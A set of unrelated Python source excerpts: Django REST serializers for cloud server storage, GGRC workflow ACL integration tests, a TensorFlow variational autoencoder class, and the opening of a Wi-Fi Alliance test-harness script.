storage = self._clone_storage(server, storage_device)
elif storage_device['action'] == 'create':
storage = self._create_storage(server, storage_device)
elif storage_device['action'] == 'attach':
storage = self._attach_storage(server, storage_device)
# IPs
return server
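# create() builds the Server first (via a factory when settings.SERVER_ACTION_LEVEL == 0,
# otherwise through the ORM) and then walks storage_devices, dispatching on each entry's
# 'action' key ('clone' / 'create' / 'attach') to obtain a Storage. Rough payload sketch,
# placeholder values only (note that 'action' is currently commented out of
# PostServerStorageSerializer.Meta.fields, so it would be dropped during validation):
#   {"server": {"title": "srv", "hostname": "srv.example", "zone": "<zone id>",
#               "plan": "<plan name>",
#               "storage_devices": [{"action": "create", "size": 10, "title": "disk0"}]}}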
class StorageSerializer(serializers.ModelSerializer):
"""Base Storage Serializer"""
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
backups = serializers.PrimaryKeyRelatedField(source='storage_set', read_only=True)
class Meta:
model = models.Storage
exclude = (
'backup_rule_interval',
'backup_rule_time',
'backup_rule_retention',
'backup_of',
'favorite',
'account',
'server',
'address',
'part_of_plan',
)
def to_internal_value(self, data):
data = data['storage']
backup_rule = data.pop('backup_rules', None)
if backup_rule:
data.update(backup_rule_interval=backup_rule['interval'],
backup_rule_time=backup_rule['time'],
backup_rule_retention=backup_rule['retention'])
return super(StorageSerializer, self).to_internal_value(data)
def to_representation(self, instance, detail=True):
data = super(StorageSerializer, self).to_representation(instance)
data.update(uuid=str(instance.uuid),
state=instance.state)
if detail:
# Backup rule
if instance.backup_rule_time and instance.type == 'disk':
backup_rule = {
'interval': instance.backup_rule_interval,
'time': instance.backup_rule_time,
'retention': instance.backup_rule_retention,
}
else:
backup_rule = ''
data.pop('backup_rule_interval', None)
data.pop('backup_rule_time', None)
data.pop('backup_rule_retention', None)
data['backup_rule'] = backup_rule
# Backup
backups = data.pop('backups', [])
if backups:
backups = backups.values_list('uuid', flat=True)
data['backups'] = {'backups': backups}
# Server
data['servers'] = {'server': []}
server_uuid = data.pop('server', None)
if server_uuid is not None:
data['servers']['server'] = [server_uuid]
# Format
data = {'storage': data}
return data
class ListStorageSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ListStorageSerializer, self).to_representation(instance)
data = {'storages': {'storage': data}}
return data
@property
def data(self):
super(ListStorageSerializer, self).data
return self._data
class StorageListSerializer(StorageSerializer):
"""List Storage Serializer"""
class Meta:
model = models.Storage
list_serializer_class = ListStorageSerializer
fields = (
'access',
'license',
'size',
'state',
'tier',
'title',
'type',
'uuid',
'zone',
)
def to_representation(self, instance):
data = super(StorageListSerializer, self).to_representation(instance, False)
return data
class StorageCreateSerializer(StorageSerializer):
class Meta:
model = models.Storage
fields = (
'size',
'tier',
'title',
'zone',
'backup_rule_interval',
'backup_rule_time',
'backup_rule_retention',
)
def validate_empty_values(self, data):
data = data.get('storage')
return super(StorageCreateSerializer, self).validate_empty_values(data)
def save(self, *args, **kwargs):
storage_data = self.validated_data
storage_data.update(account=self.account,
state='maintenance',
type='disk')
if settings.STORAGE_ACTION_LEVEL == 0:
self.instance = factories.StorageFactory(**storage_data)
else:
# TODO: Check
self.instance = super(StorageCreateSerializer, self).save(*args, **kwargs)
| |
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests Workflow related API calls."""
import datetime
import unittest
import ddt
import freezegun
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc.access_control import acl_helper
from integration.ggrc.models import factories
from integration.ggrc_workflows import generator as wf_generator
from integration.ggrc_workflows.models import factories as wf_factories
WF_ROLES = {
role.name: role.id
for role in all_models.AccessControlRole.eager_query().filter(
all_models.AccessControlRole.object_type == "Workflow").all()
}
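# WF_ROLES maps Workflow access-control role names to their AccessControlRole ids, loaded
# from the database at import time. Illustrative shape (ids are made up):
#   {"Admin": 123, "Workflow Member": 124, ...}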
@ddt.ddt # pylint: disable=too-many-public-methods
class TestWorkflowsApiPost(TestCase):
"""Test class for ggrc workflow api post action."""
def setUp(self):
super(TestWorkflowsApiPost, self).setUp()
self.api = Api()
self.generator = wf_generator.WorkflowsGenerator()
self.wf_admin_id = all_models.Person.query.first().id
with factories.single_commit():
self.people_ids = [factories.PersonFactory().id for _ in xrange(6)]
def tearDown(self):
pass
def _delete_and_check_related_acl(self, related_model, exp_acl_count,
is_deleted):
"""Delete related model and check remaining ACL count.
Args:
related_model: related model class
exp_acl_count: expected related ACL count after delete operation
is_deleted: is related object already deleted
"""
if is_deleted:
related_count = related_model.query.count()
self.assertEqual(related_count, 0)
else:
related = related_model.query.one()
response = self.api.delete(related)
self.assert200(response)
related_acl_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == related_model.__name__
).count()
self.assertEqual(related_acl_count, 0)
bg_task_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == "BackgroundTask"
).count()
all_acl_count = all_models.AccessControlList.query.count()
self.assertEqual(all_acl_count - bg_task_count, exp_acl_count)
def test_acl_on_object_deletion(self):
"""Test related ACL records removed on related object delete"""
self._create_propagation_acl_test_data()
acl_count = all_models.AccessControlList.query.count()
self.assertNotEqual(acl_count, 0)
admin = all_models.Person.query.get(1)
self.api.set_user(admin)
related_models = (
(all_models.CycleTaskEntry, 26, False),
(all_models.TaskGroup, 16, False),
(all_models.TaskGroupTask, 16, True),
(all_models.Cycle, 2, False),
(all_models.CycleTaskGroup, 2, True),
(all_models.CycleTaskGroupObjectTask, 2, True),
)
for related_model, acl_count, is_deleted in related_models:
self._delete_and_check_related_acl(related_model, acl_count, is_deleted)
def test_acl_on_workflow_delete(self):
"""Test related ACL records removed on Workflow delete"""
self._create_propagation_acl_test_data()
acl_count = all_models.AccessControlList.query.count()
self.assertNotEqual(acl_count, 0)
admin = all_models.Person.query.get(1)
self.api.set_user(admin)
workflow = all_models.Workflow.query.one()
response = self.api.delete(workflow)
self.assert200(response)
acl_count = all_models.AccessControlList.query.count()
bg_acl_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == "BackgroundTask"
).count()
self.assertEqual(acl_count, bg_acl_count)
def test_acl_for_new_related_object(self):
"""Test Workflow ACL propagation for new related objects."""
data = self.get_workflow_dict()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
data["workflow"]["access_control_list"] = acl_helper.get_acl_list(acl_map)
data["workflow"]["unit"] = "week"
data["workflow"]["repeat_every"] = 1
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[2]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[2])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
task_group = all_models.TaskGroup.eager_query().one()
data = self.get_task_dict(task_group)
data["task_group_task"]["start_date"] = "2018-01-04"
data["task_group_task"]["end_date"] = "2018-01-05"
response = self.api.post(all_models.TaskGroupTask, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
with freezegun.freeze_time("2018-01-05"): # Generate 1 cycle
self.generator.activate_workflow(workflow)
cycle_task = all_models.CycleTaskGroupObjectTask.query.one()
cycle = all_models.Cycle.query.one()
data = self.get_comment_dict(cycle_task, cycle)
response = self.api.post(all_models.CycleTaskEntry, data)
self.assertEqual(response.status_code, 201)
self._check_propagated_acl(2)
@ddt.data('Admin', 'Workflow Member')
def test_tg_assignee(self, role_name):
"""Test TaskGroup assignee already has {0} role."""
data = self.get_workflow_dict()
init_acl = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES[role_name],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_acl)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[1]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[1])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
task_group = all_models.TaskGroup.query.one()
ac_people = all_models.AccessControlPerson.query.filter(
all_models.AccessControlPerson.person_id == task_group.contact_id,
).all()
self.assertEqual(len(ac_people), 1)
actual = {
(acp.ac_list.object_type, acp.ac_list.object_id)
for acp in ac_people
}
self.assertIn((workflow.type, workflow.id), actual)
self.assertNotIn((task_group.type, task_group.id), actual)
def test_task_group_assignee_gets_workflow_member(self): # noqa pylint: disable=invalid-name
"""Test TaskGroup assignee gets WorkflowMember role."""
data = self.get_workflow_dict()
init_acl = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_acl)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[2]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[2])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
wf_members = [
acp.person.id
for acp in
workflow.acr_name_acl_map["Workflow Member"].access_control_people
]
self.assertIn(self.people_ids[2], wf_members)
def _create_propagation_acl_test_data(self): # noqa pylint: disable=invalid-name
"""Create objects for Workflow ACL propagation test."""
with freezegun.freeze_time("2017-08-9"):
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(
title='wf1',
unit=all_models.Workflow.WEEK_UNIT,
is_verification_needed=True,
repeat_every=1)
wf_factories.TaskGroupTaskFactory(
title='tgt1',
task_group=wf_factories.TaskGroupFactory(
title='tg1',
context=factories.ContextFactory(),
workflow=workflow
),
# One cycle should be created
start_date=datetime.date(2017, 8, 3),
end_date=datetime.date(2017, 8, 7)
)
self.generator.activate_workflow(workflow)
cycle = all_models.Cycle.query.one()
cycle_task = all_models.CycleTaskGroupObjectTask.query.one()
wf_factories.CycleTaskEntryFactory(
cycle=cycle,
cycle_task_group_object_task=cycle_task,
description="Cycle task comment",
)
workflow = all_models.Workflow.query.one()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
}
put_params = {'access_control_list': acl_helper.get_acl_list(acl_map)}
response = self.api.put(workflow, put_params)
self.assert200(response)
def _check_propagated_acl(self, roles_count):
"""Check Workflow propagated ACL records.
Args:
roles_count: number of roles created in the test
"""
related_objects = (
(all_models.TaskGroup.query.one().id, all_models.TaskGroup.__name__),
(all_models.TaskGroupTask.query.one().id,
all_models.TaskGroupTask.__name__),
(all_models.Cycle.query.one().id, all_models.Cycle.__name__),
(all_models.CycleTaskGroup.query.one().id,
all_models.CycleTaskGroup.__name__),
(all_models.CycleTaskGroupObjectTask.query.one().id,
all_models.CycleTaskGroupObjectTask.__name__),
)
related_count = len(related_objects) * 2 # *2 is for relationships
all_acls = all_models.AccessControlList.query.filter(
all_models.AccessControlList.parent_id_nn != 0
).count()
self.assertEqual(
all_acls,
roles_count * related_count
)
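# Worked example for the assertion above: five related object types are listed, and the
# `* 2` accounts for their Relationship records (per the inline comment), so
# related_count = 10; with roles_count = 2 the test expects 2 * 10 = 20 propagated ACL rows.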
def test_assign_workflow_acl(self):
"""Test propagation Workflow ACL roles on Workflow's update ACL records."""
self._create_propagation_acl_test_data()
self._check_propagated_acl(2)
def test_unassign_workflow_acl(self):
"""Test propagation Workflow ACL roles on person unassigned."""
self._create_propagation_acl_test_data()
with freezegun.freeze_time("2017-08-9"):
workflow = all_models.Workflow.query.one()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
put_params = {'access_control_list': acl_helper.get_acl_list(acl_map)}
response = self.api.put(workflow, put_params)
self.assert200(response)
self._check_propagated_acl(2)
def test_post_workflow_with_acl(self):
"""Test PUT workflow with ACL."""
data = self.get_workflow_dict()
exp_res = {
self.wf_admin_id: WF_ROLES['Admin'],
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
self.people_ids[3]: WF_ROLES['Workflow Member']
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(exp_res)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.eager_query().one()
act_res = {person.id: acl.ac_role_id
for person, acl in workflow.access_control_list}
self.assertDictEqual(exp_res, act_res)
def test_update_workflow_acl_people(self):
"""Test PUT workflow with updated ACL."""
data = self.get_workflow_dict()
init_map = {
self.wf_admin_id: WF_ROLES['Admin'],
self.people_ids[0]: WF_ROLES['Workflow Member'],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_map)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
exp_res = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Admin'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
self.people_ids[3]: WF_ROLES['Workflow Member'],
self.people_ids[4]: WF_ROLES['Workflow Member']
}
workflow = all_models.Workflow.eager_query().one()
put_params = {'access_control_list': acl_helper.get_acl_list(exp_res)}
response = self.api.put(workflow, put_params)
self.assert200(response)
workflow = all_models.Workflow.eager_query().one()
act_res = {person.id: acl.ac_role_id
for person, acl in workflow.access_control_list}
self.assertDictEqual(exp_res, act_res)
def test_send_invalid_data(self):
"""Test send invalid data on Workflow post."""
data = self.get_workflow_dict()
del data["workflow"]["title"]
del data["workflow"]["context"]
response = self.api.post(all_models.Workflow, data)
self.assert400(response)
# TODO: check why response.json["message"] is empty
def test_create_one_time_workflows(self):
"""Test simple create one time Workflow over api."""
data = self.get_workflow_dict()
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
def test_create_weekly_workflow(self):
"""Test create valid weekly wf"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 7
data["workflow"]["unit"] = "day"
data["workflow"]["title"] = "Weekly"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
def test_create_annually_workflow(self):
"""Test create valid annual wf"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 12
data["workflow"]["unit"] = "month"
data["workflow"]["title"] = "Annually"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
@ddt.data("wrong value", 0, -4)
def test_create_wrong_repeat_every_workflow(self, value): # noqa pylint: disable=invalid-name
"""Test case for invalid repeat_every value"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = value
data["workflow"]["unit"] = "month"
data["workflow"]["title"] = "Wrong wf"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 400)
def test_create_wrong_unit_workflow(self):
"""Test case for invalid unit value"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 12
data["workflow"]["unit"] = "wrong value"
data["workflow"]["title"] = "Wrong wf"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 400)
def test_create_task_group(self):
"""Test create task group over api."""
wf_data = self.get_workflow_dict()
wf_data["workflow"]["title"] = "Create_task_group"
wf_response = self.api.post(all_models.Workflow, wf_data)
data = self.get_task_group_dict(wf_response.json["workflow"])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
@staticmethod
def get_workflow_dict():
return {
"workflow": {
"custom_attribute_definitions": [],
"custom_attributes": {},
"title": "One_time",
"description": "",
"unit": None,
"repeat_every": None,
"notify_on_change": False,
"task_group_title": "Task Group 1",
"notify_custom_message": "",
"is_verification_needed": True,
"context": None,
}
}
def get_task_group_dict(self, workflow):
return {
"task_group": {
"custom_attribute_definitions": [],
"custom_attributes": {},
"_transient": {},
"contact": {
"id": self.wf_admin_id,
"href": "/api/people/{}".format(self.wf_admin_id),
"type": "Person"
},
"workflow": {
"id": workflow["id"],
"href": "/api/workflows/%d" % workflow["id"],
"type": "Workflow"
},
"context": {
"id": workflow["context"]["id"],
"href": "/api/contexts/%d" % workflow["context"]["id"],
"type": "Context"
},
"modal_title": "Create Task Group",
"title": "Create_task_group",
"description": "",
}
}
def get_task_dict(self, task_group):
return {
"task_group_task": {
"start_date": "2017-12-25",
"end_date": "2017-12-31",
"custom_attributes": {},
"contact": {
"id": self.wf_admin_id,
"href": "/api/people/{}".format(self.wf_admin_id),
"type": "Person"
},
"task_group": {
"id": task_group.id,
"href": "/api/task_groups/{}".format(task_group.id),
"type": "TaskGroup"
},
"context": {
"id": task_group.context_id,
"href": "/api/contexts/{}".format(task_group.context_id),
"type": "Context"
},
"title": "Create_task",
"task_type": "text",
"description": ""
}
}
@staticmethod
def get_comment_dict(cycle_task, cycle):
return {
"cycle_task_entry": {
"custom_attributes": {},
"cycle_task_group_object_task": {
"id": cycle_task.id,
"href": "/api/cycle_task_group_object_tasks/{}".format(
cycle_task.id),
"type": "CycleTaskGroupObjectTask"
},
"cycle": {
"id": cycle.id,
"href": "/api/cycles/{}".format(cycle.id),
"type": "Cycle"
},
"context": {
"id": cycle.context_id,
"href": "/api/contexts/{}".format(cycle.context_id),
"type": "Context"
},
"is_declining_review": "",
"description": "CT comment"
}
}
@ddt.data({},
{"repeat_every": 5, "unit": "month"})
def test_repeat_multiplier_field(self, data):
"""Check repeat_multiplier is set to 0 after wf creation."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(**data)
workflow_id = workflow.id
self.assertEqual(
0, all_models.Workflow.query.get(workflow_id).repeat_multiplier)
# TODO: Unskip in the patch 2
@unittest.skip("Will be activated in patch 2")
def test_change_to_one_time_wf(self):
"""Check repeat_every and unit can be set to Null only together."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(repeat_every=12,
unit="day")
resp = self.api.put(workflow, {"repeat_every": None,
"unit": None})
self.assert200(resp)
@ddt.data({"repeat_every": 5},
{"unit": "month"})
def test_change_repeat_every(self, data):
"""Check repeat_every or unit can not be changed once set."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory()
resp = self.api.put(workflow, data)
self.assert400(resp)
def test_not_change_to_one_time_wf(self):
"""Check repeat_every or unit can't be set to Null separately.
This test | |
# File: models/VAE.py
#!/usr/bin/env python
"""Variational Autoencoder class
@author: <NAME>, June 2017
VAE class implements a variational autoencoder
"""
from __future__ import print_function
from __future__ import division
import os
import numpy as np
import tensorflow as tf
import sys
sys.path.append('..')
import utils.exceptions as exc
class VAE(object):
"""Variational Autoencoder class
Attributes:
layers_encoder (list of ints): size of each layer in encoder, excluding
input layer
input_size (int): size of input
layer_latent (int): size of latent layer
layers_decoder (list of ints): size of each layer in decoder, including
output layer
num_lvs (int): size of latent layer
num_layers_enc (int): number of layers in encoder, including input
layer
num_layers_dec (int): number of layers in decoder, including latent
layer and output layer
act_func (str): activation function for network layers
weights_enc (list of tf.Variable): weights of the encoding network
biases_enc (list of tf.Variable): biases of the encoding network
weights_mean (tf.Variable): weights from encoding network to latent
variable distribution mean
biases_mean (tf.Variable): biases from encoding network to latent
variable distribution mean
weights_log_var (tf.Variable): weights from encoding network to log of
latent variable distribution variance
biases_log_var (tf.Variable): biases from encoding network to log of
latent variable distribution variance
weights_dec (list of tf.Variable): weights of the decoding network
biases_dec (list of tf.Variable): biases of the decoding network
x (tf placeholder): ph for input to model
z_mean (tf op): mean value for each latent variable
z_log_var (tf op): log of the variance for each latent variable
z (tf op): sample value of latent variable
eps (tf placeholder): ph for N(0,1) input to stochastic layer
x_recon (tf op): reconstructed input values
cost (tf op): evaluates the cost function of the network
learning_rate (float): global learning rate used by gradient descent
optimizers
train_step (tf op): evaluates one training step using the specified
cost function and learning algorithm
graph (tf.Graph): dataflow graph for the network
saver (tf.train.Saver): for saving and restoring variables
merge_summaries (tf op): op that merges all summary ops
init (tf op): op that initializes global variables in graph
"""
def __init__(
self,
layers_encoder=None,
layer_latent=None,
layers_decoder=None,
act_func='relu',
learning_rate=1e-3):
"""Constructor for VAE class
Args:
layers_encoder (list of ints): size of each layer in encoder,
including input layer
layer_latent (int): size of latent layer
layers_decoder (list of ints): size of each layer in decoder,
including output layer
act_func (str): activation function for network layers
['relu'] | 'sigmoid' | 'tanh' | 'linear' | 'softplus' | 'elu'
learning_rate (scalar): global learning rate for gradient descent
methods
Raises:
InputError if layers_encoder is not specified
InputError if layers_latent is not specified
InputError if layers_decoder is not specified
InputError if act_func is not a valid string
"""
# input checking
if layers_encoder is None:
raise exc.InputError('Must specify layer sizes for encoder')
if layer_latent is None:
raise exc.InputError('Must specify number of latent dimensions')
if layers_decoder is None:
raise exc.InputError('Must specify layer sizes for decoder')
self.input_size = layers_encoder[0]
self.layers_encoder = layers_encoder[1:]
self.layer_latent = layer_latent
self.layers_decoder = layers_decoder
if act_func == 'relu':
self.act_func = tf.nn.relu
elif act_func == 'sigmoid':
self.act_func = tf.sigmoid
elif act_func == 'tanh':
self.act_func = tf.tanh
elif act_func == 'linear':
self.act_func = tf.identity
elif act_func == 'softplus':
self.act_func = tf.nn.softplus
elif act_func == 'elu':
self.act_func = tf.nn.elu
else:
raise exc.InputError('Invalid activation function')
self.learning_rate = learning_rate
# define useful constants
self.num_lvs = self.layer_latent
self.num_layers_enc = len(self.layers_encoder)
self.num_layers_dec = len(self.layers_decoder)
# for saving and restoring models
self.graph = tf.Graph() # must be initialized before graph creation
# build model graph
with self.graph.as_default():
# define pipeline for feeding data into model
with tf.variable_scope('data'):
self._initialize_data_pipeline()
# initialize weights and create encoder model
with tf.variable_scope('encoder'):
self._define_recognition_network()
# initialize weights and create decoder model
with tf.variable_scope('decoder'):
self._define_generator_network()
# define loss function
with tf.variable_scope('loss'):
self._define_loss()
# define optimizer
with tf.variable_scope('optimizer'):
self._define_optimizer()
# add additional ops
# for saving and restoring models
self.saver = tf.train.Saver() # must be init after var creation
# collect all summaries into a single op
self.merge_summaries = tf.summary.merge_all()
# add variable initialization op to graph
self.init = tf.global_variables_initializer()
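# Minimal usage sketch (TF1-style session workflow; layer sizes and the data reader are
# illustrative placeholders, not part of this file):
#   vae = VAE(layers_encoder=[784, 256], layer_latent=2, layers_decoder=[256, 784])
#   with tf.Session(graph=vae.graph) as sess:
#       sess.run(vae.init)
#       vae.train(sess, data=reader, batch_size=128, epochs_training=10)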
def _initialize_data_pipeline(self):
"""Create placeholders for input and random values"""
self.x = tf.placeholder(
dtype=tf.float32,
shape=[None, self.input_size],
name='input_ph')
self.eps = tf.placeholder(
dtype=tf.float32,
shape=[None, self.num_lvs],
name='rand_ph')
def _define_recognition_network(self):
"""
Create a recognition network to transform inputs into its latent
representation
"""
# push data through the encoding function to determine mean and std
# of latent vars
self.weights_enc = []
self.biases_enc = []
z_enc = [self.x]
for layer in range(self.num_layers_enc):
with tf.variable_scope(str('layer_%01i' % layer)):
# initialize weights
if layer == 0:
in_size = self.input_size
else:
in_size = self.layers_encoder[layer - 1]
out_size = self.layers_encoder[layer]
self.weights_enc.append(tf.get_variable(
shape=[in_size, out_size],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1)))
# initialize biases
self.biases_enc.append(tf.get_variable(
initializer=tf.zeros(shape=[1, out_size]),
name='biases'))
# calculate layer activations
pre = tf.add(
tf.matmul(z_enc[layer], self.weights_enc[layer]),
self.biases_enc[layer])
post = self.act_func(pre)
z_enc.append(post)
# save summaries of layer activations
tf.summary.histogram('pre_act', pre)
tf.summary.histogram('post_act', post)
with tf.variable_scope('latent_layer'):
with tf.variable_scope('means'):
# initialize weights/biases for means of stochastic layer
self.weights_mean = tf.get_variable(
shape=[self.layers_encoder[-1], self.num_lvs],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1))
self.biases_mean = tf.get_variable(
initializer=tf.zeros(shape=[1, self.num_lvs]),
name='biases')
# weights to estimate mean of normally distributed latent vars
self.z_mean = tf.add(
tf.matmul(z_enc[-1], self.weights_mean), self.biases_mean,
name='z_means')
with tf.variable_scope('log_vars'):
# initialize weights/biases for log vars of stochastic layer
self.weights_log_var = tf.get_variable(
shape=[self.layers_encoder[-1], self.num_lvs],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1))
self.biases_log_var = tf.get_variable(
initializer=tf.zeros(shape=[1, self.num_lvs]),
name='biases')
# estimating log of the variance is easier since the latent
# loss has a log determinant term
self.z_log_var = tf.add(
tf.matmul(z_enc[-1], self.weights_log_var),
self.biases_log_var,
name='z_log_vars')
# transform estimated mean and log variance into a sampled value
# of the latent state using z = mu + sigma*epsilon
self.z = tf.add(
self.z_mean,
tf.multiply(tf.sqrt(tf.exp(self.z_log_var)), self.eps))
# save summaries of means and log_vars
tf.summary.histogram('means', self.z_mean)
tf.summary.histogram('log_vars', self.z_log_var)
def _define_generator_network(self):
"""
Create a generator network to transform a random sample
in the latent space into an image
"""
self.weights_dec = []
self.biases_dec = []
z_dec = [self.z]
for layer in range(self.num_layers_dec):
with tf.variable_scope(str('layer_%01i' % layer)):
# initialize weights
if layer == 0:
in_size = self.num_lvs
else:
in_size = self.layers_decoder[layer - 1]
out_size = self.layers_decoder[layer]
self.weights_dec.append(tf.get_variable(
shape=[in_size, out_size],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1)))
# initialize biases
self.biases_dec.append(tf.get_variable(
initializer=tf.zeros(shape=[1, out_size]),
name='biases'))
# calculate layer activations
pre = tf.add(
tf.matmul(z_dec[layer], self.weights_dec[layer]),
self.biases_dec[layer])
post = self.act_func(pre)
z_dec.append(post)
# save summaries of layer activations
tf.summary.histogram('pre_act', pre)
tf.summary.histogram('post_act', post)
# define this for easier access later
self.x_recon = z_dec[-1]
def _define_loss(self):
"""Define loss function that will be used to optimize model params"""
# define reconstruction loss
loss_recon = 0.5 * tf.reduce_sum(tf.square(self.x_recon - self.x), 1)
# define latent loss
loss_latent = 0.5 * tf.reduce_sum(tf.exp(self.z_log_var)
+ tf.square(self.z_mean)
- 1 - self.z_log_var, 1)
# define cost
self.cost = tf.reduce_mean(loss_recon + loss_latent)
# save summaries of cost
tf.summary.scalar('cost', self.cost)
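# The latent term above is the closed-form KL divergence between the approximate posterior
# q(z|x) = N(mu, diag(sigma^2)) and the standard normal prior p(z) = N(0, I):
#   KL(q || p) = 0.5 * sum_j( exp(log_var_j) + mu_j^2 - 1 - log_var_j )
# so `cost` is a negative evidence lower bound with a unit-variance Gaussian reconstruction
# term (up to an additive constant).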
def _define_optimizer(self):
"""Define one step of the optimization routine"""
self.train_step = tf.train.AdamOptimizer(self.learning_rate). \
minimize(self.cost)
def train(
self,
sess,
data=None,
batch_size=128,
epochs_training=10,
epochs_disp=None,
epochs_ckpt=None,
epochs_summary=None,
output_dir=None):
"""Network training
Args:
sess (tf.Session object): current session object to run graph
data (DataReader object): input to network
batch_size (int, optional): batch size used by the gradient
descent-based optimizers
epochs_training (int, optional): number of epochs for gradient
descent-based optimizers
epochs_disp (int, optional): number of epochs between updates to
the console
epochs_ckpt (int, optional): number of epochs between saving
checkpoint files
epochs_summary (int, optional): number of epochs between saving
network summary information
output_dir (string, optional): absolute path for saving checkpoint
files and summary files; must be present if either epochs_ckpt
or epochs_summary is not 'None'.
Returns:
None
Raises:
InputError: If epochs_ckpt is not None and output_dir is None
InputError: If epochs_summary is not None and output_dir is None
"""
# check input
if data is None:
raise exc.InputError('data reader must be specified')
if epochs_ckpt is not None and output_dir is None:
raise exc.InputError('output_dir must be specified to save model')
if epochs_summary is not None and output_dir is None:
raise exc.InputError('output_dir must be specified to save ' +
'summaries')
# initialize file writers
if epochs_summary is not None:
test_writer = tf.summary.FileWriter(
os.path.join(output_dir, 'summaries', 'test'),
sess.graph)
| |
###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import HTML
from xml.dom.minidom import Document
from XMLLogger import XMLLogger
VERSION = "4.2.0"
conntable = {}
retValueTable = {}
DisplayNameTable = {}
streamSendResultArray = []
streamRecvResultArray = []
streamInfoArray = []
runningPhase = '1'
testRunning = 0
threadCount = 0
resultPrinted = 0
ifcondBit = 1
iDNB = 0
iINV = 0
RTPCount = 1
#default command file path
uccPath = '..\\..\\cmds'
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
#Define extra colours
FOREGROUND_WHITE = FOREGROUND_RED | FOREGROUND_BLUE | FOREGROUND_GREEN
